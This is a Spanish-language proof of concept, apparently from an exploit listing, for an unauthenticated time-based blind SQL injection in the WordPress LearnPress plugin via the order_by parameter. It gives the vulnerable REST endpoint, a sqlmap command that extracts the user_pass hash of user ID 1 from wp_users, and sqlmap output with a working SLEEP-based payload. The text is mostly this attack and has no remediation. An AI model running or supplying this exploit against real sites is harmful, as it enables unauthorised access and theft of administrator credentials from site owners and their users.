
Prueba de concepto de explotación para una inyección SQL ciega basada en tiempo en el plugin LearnPress de WordPress, que permite a atacantes no autenticados extraer datos sensibles a través del parámetro order_by.
Inyección SQL basada en tiempo
Descripción El plugin no sanea ni escapa adecuadamente el parámetro order_by antes de usarlo en una sentencia SQL, lo que provoca una inyección SQL explotable por usuarios no autenticados
Solicitud GET vulnerable: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html
Guardar la solicitud GET
sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'
sqlmap reanudó el/los siguiente(s) punto(s) de inyección de la sesión almacenada:
Parámetro: #1* (URI) Tipo: ciego basado en tiempo Título: MySQL >= 5.0.12 AND ciego basado en tiempo (query SLEEP) Payload: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html